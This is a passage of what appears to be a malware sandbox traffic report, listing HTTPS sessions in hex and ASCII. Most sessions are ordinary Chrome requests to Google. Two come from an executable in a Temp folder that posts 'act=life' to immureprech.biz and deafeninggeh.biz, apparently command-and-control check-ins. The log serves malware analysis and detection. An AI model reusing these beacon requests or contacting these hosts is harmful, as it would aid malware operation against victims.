cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1579&rtt_var=610&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1766485&cwnd=190&unsent_bytes=0&cid=0bd061ce5bbdc1f5&ts=1212&x=0"
2024-12-14 22:58:51 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49892	172.217.19.228	443	7104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:52 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 22:58:53 UTC	1266	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:52 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-_3y4ZImrUsHfk3JN-FDaNA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 22:58:53 UTC	124	IN	Data Raw: 33 33 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 72 69 6e 63 68 20 67 72 65 65 6e 20 64 6f 75 67 68 6e 75 74 73 20 6b 72 69 73 70 79 20 6b 72 65 6d 65 22 2c 22 66 69 6e 61 6c 20 6a 65 6f 70 61 72 64 79 20 61 75 74 68 6f 72 73 22 2c 22 6d 6f 6e 6f 70 6f 6c 79 20 67 6f 20 68 61 75 6e 74 65 64 20 6d 61 6e 73 69 6f 6e 20 72 65 77 61 72 64 73 22 2c 22 67 75 6b 65 73 68 20 Data Ascii: 332)]}'["",["grinch green doughnuts krispy kreme","final jeopardy authors","monopoly go haunted mansion rewards","gukesh
2024-12-14 22:58:53 UTC	701	IN	Data Raw: 77 6f 72 6c 64 20 63 68 65 73 73 20 63 68 61 6d 70 69 6f 6e 73 68 69 70 22 2c 22 77 61 73 68 69 6e 67 74 6f 6e 20 70 6f 77 65 72 20 6f 75 74 61 67 65 73 22 2c 22 70 75 73 68 70 61 20 62 6f 78 20 6f 66 66 69 63 65 20 63 6f 6c 6c 65 63 74 69 6f 6e 20 61 6c 6c 75 20 61 72 6a 75 6e 22 2c 22 74 65 78 61 73 20 66 69 6e 61 6e 63 69 61 6c 20 61 64 76 69 73 6f 72 79 22 2c 22 63 61 6c 6c 20 6f 66 20 64 75 74 79 20 62 6c 61 63 6b 20 6f 70 73 20 36 20 66 72 65 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 Data Ascii: world chess championship","washington power outages","pushpa box office collection allu arjun","texas financial advisory","call of duty black ops 6 free"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"Chg
2024-12-14 22:58:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49891	172.217.19.228	443	7104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:52 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49890	172.217.19.228	443	7104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:52 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 22:58:53 UTC	1018	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 14 Dec 2024 22:58:52 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 22:58:53 UTC	372	IN	Data Raw: 31 34 61 39 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 14a9)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-14 22:58:53 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-14 22:58:53 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-14 22:58:53 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-14 22:58:53 UTC	755	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-14 22:58:53 UTC	724	IN	Data Raw: 32 63 64 0d 0a 63 20 67 62 5f 4f 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 31 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 42 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 43 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 34 64 20 67 62 5f 44 63 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 Data Ascii: 2cdc gb_Oc\"\u003e\u003cdiv class\u003d\"gb_1c\"\u003e\u003cdiv class\u003d\"gb_Bc\"\u003e\u003cdiv class\u003d\"gb_Cc\"\u003e\u003ca class\u003d\"gb_4d gb_Dc gb_7d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb
2024-12-14 22:58:53 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 43 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 Data Ascii: 80004],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis;\ntry{\n_.Cd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)f
2024-12-14 22:58:53 UTC	1390	IN	Data Raw: 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4e 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f Data Ascii: u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Md\u003dglobalThis.trustedTypes;_.Nd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Od\u003dnew _.Nd(\"about:invalid#zClo
2024-12-14 22:58:53 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 62 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 Data Ascii: function(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else throw Error(\"F\");else a\u003d_.be(a);return a};_.de\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void
2024-12-14 22:58:53 UTC	1390	IN	Data Raw: 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 70 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 41 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6f 65 2e 68 61 73 4f 77 6e 50 72 Data Ascii: ".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.pe\u003dfunction(a,b){_.Ab(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:oe.hasOwnPr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49893	172.217.19.228	443	7104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:52 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-14 22:58:53 UTC	933	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sat, 14 Dec 2024 22:58:52 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-14 22:58:53 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-14 22:58:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49896	104.21.22.222	443	940	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:52 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 22:58:52 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:58:53 UTC	1010	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jg8skpnn2g03kmkf3ccvi4vffm; expires=Wed, 09-Apr-2025 16:45:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dOc2oqNgRogSyPNpMiuftG%2Bv9mfmpo3BVi3MJOuX43d5J4UVNmyWZF3o9M0YilcLEzjPxLENtz6NEGltY1CkWtUul2n5QFw7e21K%2BVBRRKKv8QLojhLi3wNNcEBJpiQEFnU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cd17ee58c3ff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7174&min_rtt=1518&rtt_var=4068&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1923583&cwnd=246&unsent_bytes=0&cid=e4f8c3ecf0e06a62&ts=700&x=0"
2024-12-14 22:58:53 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49907	104.21.64.1	443	940	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:54 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 22:58:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:58:55 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=df61psngg2utrmhdnkfpqc32ql; expires=Wed, 09-Apr-2025 16:45:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POk%2BPjgqObpPOjtHtHCf76R1GgitVyswjDkY%2F7erULS5z1mnMZC%2B0PqxnrbwFjZtdrYPguXuT7k8xwiHJc5j0XOtxFKmfEQVUwdlICjuJMEDmCIKrZVCmJJKD9vVmsOOmww%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cd244d2642e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: 